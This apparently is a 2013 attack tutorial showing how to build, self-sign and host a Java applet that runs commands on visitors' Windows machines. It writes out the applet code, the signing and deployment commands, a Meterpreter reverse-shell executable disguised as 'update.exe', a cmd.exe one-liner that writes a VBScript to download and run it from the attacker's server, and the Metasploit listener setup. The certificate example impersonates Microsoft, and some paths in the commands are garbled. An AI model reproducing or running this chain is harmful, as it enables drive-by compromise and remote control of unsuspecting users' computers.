method and code to bind java applet with a payload
import java.applet.*;
import java.awt.*;
import java.io.*;

// Applet that launches cmd.exe on the client as soon as the browser initialises it
public class MSFcmd extends Applet {
    public void init() {
        Process f;
        String cmd = "cmd.exe";
        try {
            f = Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
        Process s;
    }
}

Next, we need to self-sign the applet so that it can be run with access within the browser.

Compile the Applet source code to an executable class:

javac MSFcmd.java

Package the compiled class into a JAR file:

jar cvf MSFcmd.jar MSFcmd.class

Generate key pairs:

keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file:

jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate:

keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use, I built a simple bash script called makeapplet.sh. Example of running makeapplet.sh:

./makeapplet.sh
Enter the name of the applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
  [Unknown]:
What is the name of your organizational unit?
  [Unknown]:  Microsoft
What is the name of your organization?
  [Unknown]:  Microsoft Organization
What is the name of your City or Locality?
  [Unknown]:  Redmond
What is the name of your State or Province?
  [Unknown]:  Seatle
What is the two-letter country code for this unit?
  [Unknown]:  US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
  [no]:  yes
[+] Signing the JAR file
Warning: The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo "" > /var/www/index.html
sudo /etc/init.d/apache2 start

Browse to the webserver from a Windows system, which will execute cmd.exe.

To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit. The executable can be constructed by (replace x.x.x.x with the IP of your server):

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -t exe -o update.exe; cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now, we need to add a command into the Java Applet to download and execute the executable:

cmd.exe /c echo Const adTypeBinary = 1 > C:windowsapsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:windowsapsou.vbs & echo Dim BinaryStream >> C:windowsapsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:windowsapsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:windowsapsou.vbs & echo BinaryStream.Open >> C:windowsapsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:windowsapsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:windowsapsou.vbs & echo Function BinaryGetURL(URL) >> C:windowsapsou.vbs & echo Dim Http >> C:windowsapsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:windowsapsou.vbs & echo Http.Open "GET", URL, False >> C:windowsapsou.vbs & echo Http.Send >> C:windowsapsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:windowsapsou.vbs & echo End Function >> C:windowsapsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:windowsapsou.vbs & echo shell.Run "C:windowsupdate.exe" >> C:windowsapsou.vbs & start C:windowsapsou.vbsx.x.x.x/my.exe C:windowsupdate.exe

(replace x.x.x.x with the IP of your server)

Reference: milw0rm/papers/262

Setup Metasploit to listen for the connections:

sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j
...
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...
Posted on: Sun, 15 Sep 2013 03:33:15 +0000